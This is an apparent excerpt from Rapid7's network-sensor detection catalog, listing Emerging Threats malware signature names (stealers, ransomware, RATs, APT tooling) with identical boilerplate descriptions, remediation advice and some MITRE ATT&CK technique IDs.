This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Moist Stealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MoneroPay Ransomware Payment Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Monsoon Tinytyphon CnC Beacon Exfiltrating Docs

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Monsoon Tinytyphon CnC Beacon GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE MontysThree HTTPTransport Module Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Moose CnC Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MosesStaff APT Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MRCR1 Ransomware Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MRCR1 Ransomware Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MS_D0wnl0ad3r Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MS_D0wnl0ad3r Screenshot Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.ATS CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.BIC Variant CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.DNL CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.DNL Server Response Task (whoami)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.TRM Checkin Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.TRM Data Exfil (sysinfo)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.TRM Task Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Alcatrez Locker Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Almashreq CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Almashreq Executing New Processes

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL APT28 Zebrocy/Zekapab Reporting to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL APT28 Zebrocy/Zekapab Reporting to CnC M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Autorun.AD Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Azula Logger CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.BackNet Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/BlackGuard Stealer Exfil Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/BlackGuard Stealer Variant Exfil via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Bobik CnC Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/CoalaBot CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/CoderVir Stealer Zip Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/CoinMiner Performing System Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE MSIL/Document Stealer Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/EasyLocker Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Eredel Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/G1 Stealer/GravityRAT Requesting Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/G1 Stealer/GravityRAT Uploading File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/G2 Stealer/GravityRAT CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/GenKryptik.FQRH Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/GravityRAT CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/GX Stealer/GravityRAT Uploading File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/HadesLocker Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Heracles Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Hidden-Tear Variant Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Injector.VVP Downloader Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Juliens Botnet CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Karmen Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/KeyRedirEx Banker Receiving Exit Instruction

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/KeyRedirEx Banker Receiving Redirect/Inject List

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/KeyRedirEx Banker Requesting Redirect/Inject List

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Khonsri Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL.Kraken.v2 HTTP Pattern

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.L4L Stealer IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.L4L Stealer Screenshot Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.L4L Stealer Systeminfo Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Lordix Stealer Exfiltrating Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Matrix Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Matrix Ransomware Sending Encrypted Filelist

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Monitor.PCTattletale.A Checkin (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/n2019cov (COVID-19) Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/NewHT Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/NoCry Ransomware Checkin Via Discord

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/NR42 Bot Parsing Config From Webpage

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/PSW.Agent.QJK Stealer Data Exfil Via HTTP

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Runsome Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/SamMiner CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SamMiner CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat CnC Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat User-Agent Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Small.FU Variant CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Small.FU Variant CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Small.FU Variant CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Spy.Banker.DH Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Spy.Keylogger.ENJ Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Agent.JVN CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Agent.KUO CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Agent.KUO CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Small.CLJ CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Unk.HT-Based Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL.Zapchast Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MS Office Macro Dridex Download URI Jan 7 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSUpdater alt checkin to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSUpdater Connectivity Check to Google

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSUpdater POST checkin to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater APT Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload - CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Registering with CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Requesting Command from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Sending Command Output to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Sending Screenshot to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Murlo Trojan Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MUROFET/Licat Trojan

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mustang Panda/RedDelta Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mustang Panda/RedDelta Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mutter Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Load Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Posting Host Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Stats Callout Aug 18 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Stats Callout Oct 28

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MyKings Bootloader Variant Requesting Payload M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MyKings Bootloader Variant Requesting Payload M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MyKings Bootloader Variant Requesting Payload M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MZRevenge Ransomware CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Naoinstalad Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nebuler/Dialer.qn HTTP Request - Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nemty Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Nemty Ransomware Payment Page ID File Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Nemucod Downloading Payload 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nemucod JS Downloader Aug 01 2017

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nemucod JS Downloader June 12 2017

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NetBackdoor Checkin
